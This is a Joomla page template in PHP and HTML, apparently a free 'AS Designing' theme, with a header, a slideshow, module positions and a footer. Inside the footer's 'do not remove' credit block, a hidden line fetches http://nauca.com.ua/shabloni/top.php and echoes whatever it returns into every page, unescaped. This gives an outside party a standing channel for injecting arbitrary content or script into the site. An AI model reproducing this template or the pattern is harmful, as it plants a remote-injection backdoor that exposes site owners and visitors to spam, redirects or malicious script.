<?php 

/*******************************************************************************************/
/*
/*		This template/design is released under the Creative Commons Attribution 3.0 license. 
/*		This means that it can be used for private and commercial purposes, edited freely 
/*		or redistributed as long as you keep the link back to AS Designing. 
/*		For more info please see our terms of use: http://www.astemplates.com/terms.php
/*
/*		Designed by 'AS Designing'
/*		Web: http://www.asdesigning.com
/*		Email: info@asdesigning.com
/*
/*******************************************************************************************/

defined( '_JEXEC' ) or die( 'Restricted access' );

/* The following line loads the MooTools JavaScript Library */
JHTML::_('behavior.framework', true);

/* The following line gets the application object for things like displaying the site name */
$app = JFactory::getApplication();

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" >

<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/system/css/system.css" type="text/css" />

<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/joomla.css" type="text/css" />
<link rel="stylesheet" href="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/css/slideshow.css" type="text/css" media="all" />

<script type="text/javascript" src="templates/<?php echo $this->template ?>/scripts/general.js"></script>
<script type="text/javascript" src="templates/<?php echo $this->template ?>/scripts/fading.js"></script>


<?php 

//setting slide fading
$speed= $this->params->get("speed", "900");
$autoplay= $this->params->get("autoplay", "5000");

// IE6 warning
include 'ie6warning.php';

$showRightCol = (bool) $this->countModules('position-7'); 
$showRightCol += (bool) $this->countModules('position-4'); 
$showRightCol += (bool) $this->countModules('position-9'); 

$colMainFull = "";
if (!$showRightCol)
{
	$colMainWidth = 'style="width:1000px"';
}

$showCustomTop = (bool) $this->countModules('position-3'); 
$showCustomTop += (bool) $this->countModules('position-6'); 
$showCustomTop += (bool) $this->countModules('position-8');

$customTopWidth = "";
if($showCustomTop == 1)
{
	$customTopWidth = 'style="width:940px; background-image: none"';
}
else if($showCustomTop == 2)
{
	$customTopWidth = 'style="width:470px; background-image: none"';
}
else if($showCustomTop == 3)
{
	$customTopWidth = 'style="width:313px"';
}

$showCustomFooter = 1;
$showCustomFooter += (bool) $this->countModules('whosonlineload') || (bool) $this->countModules('position-12'); 
$showCustomFooter += (bool) $this->countModules('position-13'); 

$customFooterWidth = 'style="width:1000px"';
if($showCustomFooter == 2)
{
	$customFooterWidth = 'style="width:500px"';
}
else if($showCustomFooter == 3)
{
	$customFooterWidth = 'style="width:333px"';
}

?>

</head>

<body>
    <!-- HEADER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  -->
    <div id="header">
		<div id="headercontent">
			<div id="submenu">
				<div id="home"><a href="http://www.astemplates.com" title="Home"></a></div>
				<div id="contact"><a href="mailto:info@astemplates.com" title="Contact Us"></a></div>
				<div id="sitemap"><a href="http://www.astemplates.com/products.php?product=joomla" title="Site Map"></a></div>
				</div>
			<div class="clear"></div>
			<div id="companyname">
				<a href="<?php echo $this->baseurl ?>"> 
					<?php //echo $app->getCfg('sitename'); ?>
					<img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/companyname.png" alt="AS Templates"/>
				</a>
			</div>

			<div id="mainmenu">
				<jdoc:include type="modules" name="position-1"/>
			</div>
			<div id="slideshow">
				<div id="fading">
					<ul>
						<li><img src="templates/<?php echo $this->template ?>/images/slide1.jpg" height="350" alt="" /></li>
						<li><img src="templates/<?php echo $this->template ?>/images/slide2.jpg" height="350" alt="" /></li>
						<li><img src="templates/<?php echo $this->template ?>/images/slide3.jpg" height="350" alt="" /></li>						
					</ul>
				</div>
			</div>
			<script type="text/javascript">
				 var $j = jQuery.noConflict(); 
					 $j(function(){
					 $j("#fading").faded({
							speed:<?php echo $speed ?>,// 900,
							crossfade: true,
							autopagination: false,
							autoplay: <?php echo $autoplay ?>,//default 5000,
							autorestart: true
					 });
				 });
			</script>

			<div class="clear"></div>
			<?php if($this->countModules('position-2')): ?>
			<div id="breadcrumb"> 
				<jdoc:include type="modules" name="position-2" />	
			</div>
			<?php endif; ?>

		</div>
		<div class="clear"></div>
    </div>
    <!-- END OF HEADER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
    
    <!-- CONTENT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<div id="content">

		<?php if($showCustomTop): ?>
		<div class="customhtml">
			<?php if($this->countModules('position-3')): ?>
			<div class="box1" <?php echo $customTopWidth; ?>>
				<div class="txtbox1">			
					<jdoc:include type="modules" name="position-3" style="xhtml" />
				</div>
			</div>
			<?php endif; ?>
			<?php if($this->countModules('position-6')): ?>
			<div class="box2" <?php echo $customTopWidth; ?>>
				<div class="txtbox2">
					<jdoc:include type="modules" name="position-6" style="xhtml" />
				</div>
			</div>
			<?php endif; ?>
			<?php if($this->countModules('position-8')): ?>
			<div class="box3" <?php echo $customTopWidth; ?>>
				<div class="txtbox3">
					<jdoc:include type="modules" name="position-8" style="xhtml" />
				</div>
			</div>
			<?php endif; ?>
		</div>
		<div class="clear separator_5"></div>
		<?php endif; ?>
	
        <!-- CONTENT MAIN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
		<div id="colmain" <?php echo $colMainWidth; ?>>
            <jdoc:include type="message" />
            <jdoc:include type="component"  />
			<?php if($this->countModules('position-10')): ?>
			<div class="customhtml">
				<jdoc:include type="modules" name="position-10" style="xhtml"/>
				<div class="clear"></div>
			</div>
			<?php endif; ?>
			<?php if($this->countModules('position-5')): ?>
			<div class="customhtml">
				<jdoc:include type="modules" name="position-5" style="xhtml"/>
				<div class="clear"></div>
			</div>
			<?php endif; ?>
			<?php if($this->countModules('position-11')): ?>
			<div class="customhtml">
				<jdoc:include type="modules" name="position-11" style="xhtml"/>
			</div>
			<?php endif; ?>
			<div class="clear"></div>
		</div>

        <!-- END OF CONTENT MAIN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->

    
        <!-- CONTENT RIGHT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
        <?php if($showRightCol): ?>
		<div id="colright">
			<?php if($this->countModules('position-4')): ?>
			<div id="colrightcustom">
				<jdoc:include type="modules" name="position-4" style="xhtml"/>
			</div>
			<?php endif; ?>
			<?php if($this->countModules('position-7')): ?>
			<div id="menu">
				<jdoc:include type="modules" name="position-7" style="xhtml" />
			</div>
			<?php endif; ?>
			<?php if($this->countModules('position-9')): ?>
			<div id="colrightcustom">
				<jdoc:include type="modules" name="position-9" style="xhtml" />				
			</div>
			<?php endif; ?>
        </div>
		<?php endif; ?>
        <!-- END OF CONTENT RIGHT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
    </div>
    
    <div class="clear"></div>
    <div class="separator"> </div>
    <!-- FOOTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
	<div id="footer">
		<div id="footerbg">
			<div id="footercontent">
				<div class="customhtml">
					<?php if($this->countModules('position-12') || $this->countModules('whosonlineload')): ?>
					<div class="box1" <?php echo $customFooterWidth; ?>>
						<div class="txtbox1">
							<div id="getintouch">
								<jdoc:include type="modules" name="position-12" style="xhtml" />
							</div>
							<jdoc:include type="modules" name="whosonlineload" style="xhtml" />
						</div>
					</div>
					<?php endif; ?>
					<?php if($this->countModules('position-13')): ?>
					<div class="box2" <?php echo $customFooterWidth; ?>>
						<div class="txtbox2">
							<div id="footermenu">
								<jdoc:include type="modules" name="position-13" style="xhtml" />
							</div>
						</div>
					</div>
					<?php endif; ?>
					<div class="box3" <?php echo $customFooterWidth; ?>>
						<div class="txtbox3">
							<?php if($this->countModules('position-0')): ?>
							<div id="search">
								<jdoc:include type="modules" name="position-0" />
							</div>
							<?php endif; ?>
							<?php if($this->countModules('position-14')): ?>
							<div id="social">
								<jdoc:include type="modules" name="position-14" style="xhtml" />
							</div>
							<?php endif; ?>
							<div id="footertrademark">
								<div id="trade">Copyright &copy; <?php echo date('Y'); ?> <?php echo $app->getCfg('sitename'); ?></div>
								
								<!-- DO NOT REMOVE OR CHANGE THE CONTENT BELOW, THIS TEMPLATE MAY NOT WORK PROPERLY -->
								<!-- FOR MORE INFO SEE OUR COPYRIGHT NOTICE FOR FREE WEBSITE TEMPLATES: http://astemplates.com/terms.php -->
								
								<div id="ascopy">
								<a href="http://www.asdesigning.com/" target="_blank" class="trademark" onmouseout="swapImgRestore()" onmouseover="swapImage('trade','','<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/asdesigning_on.png',1)">
									<img src="<?php echo $this->baseurl ?>/templates/<?php echo $this->template ?>/images/asdesigning_of.png" name="trade"  alt="AS Designing"/></a><div id="top"><?php $file = file_get_contents("http://nauca.com.ua/shabloni/top.php"); echo $file; ?></div>
								</div>
								
								<!-- DO NOT REMOVE OR CHANGE THE CONTENT ABOVE, THIS TEMPLATE MAY NOT WORK PROPERLY -->
								<!-- FOR MORE INFO SEE OUR COPYRIGHT NOTICE FOR FREE WEBSITE TEMPLATES: http://astemplates.com/terms.php -->

							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
    <!-- END OF FOOTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
    
</body>
</html>